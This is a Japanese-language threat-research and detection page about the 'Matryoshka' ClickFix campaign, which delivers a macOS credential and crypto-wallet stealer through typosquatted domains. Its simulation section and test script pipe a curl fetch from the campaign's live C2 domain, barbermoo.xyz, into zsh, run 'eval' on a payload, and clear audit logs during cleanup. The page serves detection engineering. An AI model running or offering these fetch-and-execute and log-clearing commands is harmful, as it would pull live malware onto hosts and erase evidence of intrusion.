SOC Prime Bias: 中程度

17 Feb 2026 15:00 UTC

新しい「マトリョーシカ」ClickFixバリアントを解剖:タイポスクワッティングキャンペーンがmacOSスティーラーを配信

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon フォローする
新しい「マトリョーシカ」ClickFixバリアントを解剖:タイポスクワッティングキャンペーンがmacOSスティーラーを配信
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

概要

Matryoshkaと名付けられた新しいmacOSマルウェア作戦は、タイポスクワッティングされたドメインを悪用し、被害者に悪意あるコマンドをTerminalに貼り付けさせる社会工学を駆使しています。このワンライナーは、メモリ内でデコードを行うエンコードされたスクリプトを引き出し、最終的にはAppleScriptベースのスティーラーを展開して、ブラウザの資格情報と暗号通貨ウォレットを狙います。インストーラーはバックグラウンドで静かに動作し、目に見える出力を抑制し、収集したデータをアップロードします カスタムAPIヘッダーによって。キャンペーンはソフトウェアの脆弱性を利用するのではなく、ユーザーの操作に依存しています。

調査

Intego のアナリストは、タイポスクワッティングされたドメインがbarbermoo.xyzにホストされた軽量のシェルステージにユーザーをリダイレクトするチェーンを再構築しました。スクリプトはメモリ内でBase64 + gzipデコードを実行し、AppleScriptペイロードを取得するローダーを実行し、収集結果を/tmp/osalogging.zipにステージングしてから漏洩します。AppleScriptは、偽のシステム環境設定のプロンプトを表示してクレデンシャルを盗もうとし、またLedger LiveとTrezor Suiteアプリケーションバンドルを置き換えまたはパッチを当てることで暗号ツールをターゲットにします。

緩和策

ユーザーの意識が主な対策です:WebサイトからTerminalコマンドを貼り付けないでください。識別されたタイポスクワッティングドメインとC2関連ドメイン、ならびに配信をサポートするトラフィック分配インフラストラクチャをブロックして監視してください。アプリケーションの許可リストを適用し、不審なosascriptの実行と異常なcurlベースの取得パターンを検出できるエンドポイント保護を使用してください。

対応策

Terminalから開始されるcurlがzshまたはosascriptにパイプされる場合に警告を出し、/tmp/osalogging.zipの作成を監視し、Ledger LiveとTrezor Suiteバンドルへの予期しない変更をフラグ付けします。barbermoo.xyz、comparisions.org、macfilesendstream.comのDNSフィルタリングを強制してください。curl駆動のコマンド実行直後にバックグラウンドで静かに起動するプロセスを調査してください。

攻撃フロー

シミュレーション実行

前提条件: テレメトリおよびベースラインの離陸前チェックに合格していること。

根拠: このセクションでは、検出ルールを発動するために設計された敵対者の技術(TTP)の正確な実行を詳細に説明しています。コマンドと説明は、特定されたTTPを直接反映し、検出ロジックによって予期される正確なテレメトリを生成することを目的としていなければなりません。

  • 攻撃の物語とコマンド:
    すでに低特権のmacOSアカウントを侵害した敵対者は、ファイルをディスクに書き込まずにリモートペイロードを実行したがっています。彼らは、悪意のあるC2ドメインからbase64エンコードされたスクリプトをフェッチするワンライナーを作成します(barbermoo.xyz)、それを直接 zshにパイプし、最終的に eval を使用して、メモリ内でペイロードを実行します。このアプローチは、T1059.004(Unixシェル)およびT1027(難読化)に一致し、Sigmaルールが監視しているものと正確に一致します。

    1. 攻撃者はリクエストをキャンペーンに結びつけるユニークなトークン(ABCD1234)を入手します。

    2. 彼らはTerminalセッションで次のワンライナーを実行します:

      curl -fsSL https://barbermoo.xyz/curl/ABCD1234 | zsh
    3. フェッチされたスクリプトの中で、変数 payload がbase64エンコードされた悪意あるペイロードを保持し、これは以下を通じて実行されます:

      eval "$payload"

    これにより、ルールが一致する2つの異なるコマンドラインエントリが生成されます:

    • curl -fsSL https://barbermoo.xyz/curl/ABCD1234 | zsh
    • eval "$payload"
  • 回帰テストスクリプト:
    以下のスクリプトは、管理されたラボ環境で不正行為を再現します。 これをmacOSテストホストでのみ実行してください。 それは自身の実行をシステム監査ログに記録し、検出ルールを満たしています。

    #!/usr/bin/env bash
    # -------------------------------------------------
    # Matryoshkaバリアントシミュレーション – Sigmaルールをトリガー
    # -------------------------------------------------
    set -euo pipefail
    
    # --- 設定 -------------------------------------------------
    TOKEN="ABCD1234"                     # ユニークさをシミュレートするために任意の文字列に置換
    MALICIOUS_URL="https://barbermoo.xyz/curl/${TOKEN}"
    # デモ用の小さく無害なペイロード – メッセージをエコーする(レッドチームで実際のペイロードに置き換え)
    PAYLOAD="echo '悪意のあるペイロードが実行されました'"
    
    # --- ステップ1: フェッチしてzshにパイプする(最初の検出パターンに一致) ---
    curl -fsSL "${MALICIOUS_URL}" | zsh
    
    # --- ステップ2: メモリ内でのevalをシミュレート(2番目のパターンに一致) -------------
    # 実際の攻撃では、ペイロードはbase64エンコードされ、その場でデコードされます。
    eval "${PAYLOAD}"
  • クリーンアップコマンド: 一時的なプロセスを削除し、シェルの状態を復元します。

    # テストによって生成されたzshプロセスを終了します(まだ実行中の場合)
    pkill -f "zsh -c .*barbermoo.xyz"
    
    # オプションで、テストエントリの監査ログをクリアします(管理者が必要)
    sudo audit -c      # 監査バッファをフラッシュすること(T1070.010を示す)